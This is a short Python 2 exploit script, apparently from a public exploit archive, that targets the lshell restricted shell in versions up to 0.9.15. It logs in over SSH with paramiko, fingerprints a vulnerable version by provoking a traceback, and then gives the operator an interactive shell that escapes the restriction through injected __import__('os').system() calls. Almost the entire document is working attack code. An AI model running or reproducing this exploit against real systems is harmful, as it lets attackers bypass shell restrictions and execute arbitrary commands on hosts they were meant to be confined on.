lshell 0.9.15 remote

1. import paramiko
2. import traceback
3. from time import sleep
4.  
5. #
6. # Exploit lshell pathing vulnerability in <= 0.9.15.
7. # Runs commands on the remote system.
8. # @dronesec
9. #
10.  
11. if len(sys.argv) < 4:
12.     print '%s: [USER] [PW] [IP] {opt: port}'%(sys.argv[0])
13.     sys.exit(1)
14.  
15. try:
16.     print '[!] .............................'
17.     print '[!] lshell <= 0.9.15 remote shell.'
18.     print '[!] note: you can also ssh in and execute \'/bin/bash\''
19.     print '[!] .............................'
20.     print '[!] Checking host %s...'%(sys.argv[3])
21.     ssh = paramiko.SSHClient()
22.     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
23.     if len(sys.argv) == 5:
24.         ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
25.     else:
26.         ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
27.  
28.  
29.     # verify lshell
30.     channel = ssh.invoke_shell()
31.     while not channel.recv_ready(): sleep(1)
32.     ret = channel.recv(2048)
33.  
34.     channel.send('help help\n')
35.     while not channel.recv_ready(): sleep(1)
36.     ret = channel.recv(2048)
37.  
38.     if not 'lshell' in ret:
39.         if 'forbidden' in ret:
40.             print '[-] Looks like we can\'t execute SSH commands'
41.         else:
42.             print '[-] Environment is not lshell'
43.         sys.exit(1)
44.  
45.     # verify vulnerable version
46.     channel.send('sudo\n')
47.     while not channel.recv_ready(): sleep(1)
48.     ret = channel.recv(2048)
49.     if not 'Traceback' in ret:
50.         print '[-] lshell version not vulnerable.'
51.         sys.exit(1)
52.     channel.close()
53.     ssh.close()
54.  
55.     # exec shell
56.     print '[+] vulnerable lshell found, preparing pseudo-shell...'
57.     if len(sys.argv) == 5:
58.         ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])
59.     else:
60.         ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])
61.  
62.     while True:
63.         cmd = raw_input('$ ')
64.  
65.         # breaks paramiko
66.         if cmd[0] is '/':
67.             print '[!] Running binaries won\'t work!'
68.             continue
69.  
70.         cmd = cmd.replace("'", r"\'")
71.         cmd = 'echo __import__(\'os\').system(\'%s\')'%(cmd.replace(' ',r'\t'))
72.         if len(cmd) > 1:
73.             if 'quit' in cmd or 'exit' in cmd:
74.                 break
75.             (stdin,stdout,stderr) = ssh.exec_command(cmd)
76.         out = stdout.read()
77.         print out.strip()
78. except paramiko.AuthenticationException:
79.     print '[-] Authentication to %s failed.'%sys.argv[3]
80. except Exception, e:
81.     print '[-] Error: ', e
82.     print type(e)
83.     traceback.print_exc(file=sys.stdout)
84. finally:
85.     channel.close()
86.     ssh.close()